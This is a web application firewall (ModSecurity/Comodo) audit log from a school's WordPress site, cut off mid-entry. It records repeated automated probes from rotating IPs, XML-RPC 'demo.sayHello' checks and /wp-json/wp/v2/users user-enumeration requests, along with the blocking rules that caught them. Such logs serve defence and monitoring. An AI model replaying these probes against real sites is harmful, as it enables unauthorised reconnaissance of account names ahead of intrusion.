Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f03940-Z-- --d1412628-A-- [17/May/2025:23:27:17 +0700] aCi45RKi5m5upc8uMd5K6QAAAM4 103.236.140.4 49132 103.236.140.4 8181 --d1412628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1412628-C-- demo.sayHello --d1412628-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1412628-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499237309108 14922 (- - -) Stopwatch2: 1747499237309108 14922; combined=23960, p1=371, p2=3324, p3=36, p4=38, p5=10107, sr=64, sw=53, l=0, gc=10031 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1412628-Z-- --20994a42-A-- [17/May/2025:23:27:25 +0700] aCi47QTOsBn9MSWb6WICpgAAAIs 103.236.140.4 49724 103.236.140.4 8181 --20994a42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20994a42-C-- demo.sayHello --20994a42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20994a42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499245875752 4963 (- - -) Stopwatch2: 1747499245875752 4963; combined=3780, p1=604, p2=2968, p3=34, p4=29, p5=86, sr=69, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20994a42-Z-- --e86fea34-A-- [17/May/2025:23:27:40 +0700] aCi4_ATOsBn9MSWb6WIDAQAAAI0 103.236.140.4 50708 103.236.140.4 8181 --e86fea34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e86fea34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86fea34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499260539748 2762 (- - -) Stopwatch2: 1747499260539748 2762; combined=1226, p1=413, p2=776, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86fea34-Z-- --c9e3203e-A-- [17/May/2025:23:27:52 +0700] aCi5CBKi5m5upc8uMd5MGAAAAMA 103.236.140.4 51502 103.236.140.4 8181 --c9e3203e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9e3203e-C-- demo.sayHello --c9e3203e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9e3203e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499272037854 5870 (- - -) Stopwatch2: 1747499272037854 5870; combined=4375, p1=624, p2=3477, p3=31, p4=35, p5=135, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9e3203e-Z-- --654c385b-A-- [17/May/2025:23:28:46 +0700] aCi5PgTOsBn9MSWb6WIExQAAAIM 103.236.140.4 55364 103.236.140.4 8181 --654c385b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --654c385b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --654c385b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499326267897 2487 (- - -) Stopwatch2: 1747499326267897 2487; combined=1279, p1=469, p2=777, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --654c385b-Z-- --578dc565-A-- [17/May/2025:23:28:53 +0700] aCi5RQTOsBn9MSWb6WIE2AAAAII 103.236.140.4 55866 103.236.140.4 8181 --578dc565-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --578dc565-C-- demo.sayHello --578dc565-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --578dc565-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499333556092 7098 (- - -) Stopwatch2: 1747499333556092 7098; combined=5284, p1=691, p2=4340, p3=43, p4=45, p5=99, sr=81, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --578dc565-Z-- --e701d73d-A-- [17/May/2025:23:29:47 +0700] aCi5ewTOsBn9MSWb6WIF_gAAAIM 103.236.140.4 59674 103.236.140.4 8181 --e701d73d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e701d73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e701d73d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499387594722 3082 (- - -) Stopwatch2: 1747499387594722 3082; combined=1688, p1=497, p2=1154, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e701d73d-Z-- --416ced67-A-- [17/May/2025:23:29:54 +0700] aCi5ghKi5m5upc8uMd5PnAAAAM4 103.236.140.4 60154 103.236.140.4 8181 --416ced67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --416ced67-C-- demo.sayHello --416ced67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --416ced67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499394760499 5510 (- - -) Stopwatch2: 1747499394760499 5510; combined=4113, p1=521, p2=3364, p3=32, p4=36, p5=95, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --416ced67-Z-- --a3c48546-A-- [17/May/2025:23:30:07 +0700] aCi5j3yxdQCiyU1ENFfSTgAAAAM 103.236.140.4 32800 103.236.140.4 8181 --a3c48546-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c48546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c48546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499407339577 2424 (- - -) Stopwatch2: 1747499407339577 2424; combined=1029, p1=353, p2=652, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c48546-Z-- --63bc7767-A-- [17/May/2025:23:30:13 +0700] aCi5lQTOsBn9MSWb6WIG2QAAAIw 103.236.140.4 33258 103.236.140.4 8181 --63bc7767-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63bc7767-C-- demo.sayHello --63bc7767-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63bc7767-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499413933673 7700 (- - -) Stopwatch2: 1747499413933673 7700; combined=5538, p1=734, p2=4519, p3=39, p4=44, p5=119, sr=88, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63bc7767-Z-- --12cdf91b-A-- [17/May/2025:23:30:38 +0700] aCi5rnyxdQCiyU1ENFfS4AAAAAs 103.236.140.4 35068 103.236.140.4 8181 --12cdf91b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12cdf91b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12cdf91b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499438148900 2271 (- - -) Stopwatch2: 1747499438148900 2271; combined=949, p1=306, p2=619, p3=0, p4=0, p5=24, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12cdf91b-Z-- --1026730c-A-- [17/May/2025:23:30:45 +0700] aCi5tXyxdQCiyU1ENFfTHAAAABY 103.236.140.4 35624 103.236.140.4 8181 --1026730c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1026730c-C-- demo.sayHello --1026730c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1026730c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499445916443 4482 (- - -) Stopwatch2: 1747499445916443 4482; combined=3261, p1=433, p2=2639, p3=30, p4=27, p5=76, sr=58, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1026730c-Z-- --d519b160-A-- [17/May/2025:23:31:16 +0700] aCi51BKi5m5upc8uMd5SFwAAANQ 103.236.140.4 37768 103.236.140.4 8181 --d519b160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d519b160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d519b160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499476656319 2803 (- - -) Stopwatch2: 1747499476656319 2803; combined=1189, p1=481, p2=684, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d519b160-Z-- --e4aa9402-A-- [17/May/2025:23:31:25 +0700] aCi53QTOsBn9MSWb6WII8gAAAIM 103.236.140.4 38348 103.236.140.4 8181 --e4aa9402-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4aa9402-C-- demo.sayHello --e4aa9402-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4aa9402-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499485713046 4944 (- - -) Stopwatch2: 1747499485713046 4944; combined=3701, p1=556, p2=2918, p3=31, p4=31, p5=96, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4aa9402-Z-- --2fdf192a-A-- [17/May/2025:23:31:26 +0700] aCi53nyxdQCiyU1ENFfUQgAAABE 103.236.140.4 38392 103.236.140.4 8181 --2fdf192a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fdf192a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fdf192a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499486516487 3622 (- - -) Stopwatch2: 1747499486516487 3622; combined=1605, p1=553, p2=1016, p3=0, p4=0, p5=36, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fdf192a-Z-- --1f2f7d0a-A-- [17/May/2025:23:31:32 +0700] aCi55HyxdQCiyU1ENFfUjAAAAAs 103.236.140.4 38816 103.236.140.4 8181 --1f2f7d0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f2f7d0a-C-- demo.sayHello --1f2f7d0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f2f7d0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499492515669 6272 (- - -) Stopwatch2: 1747499492515669 6272; combined=4637, p1=648, p2=3756, p3=36, p4=41, p5=93, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f2f7d0a-Z-- --242ec754-A-- [17/May/2025:23:32:03 +0700] aCi6A-m4kjNN-hEbWjLX3wAAAFc 103.236.140.4 40980 103.236.140.4 8181 --242ec754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --242ec754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --242ec754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 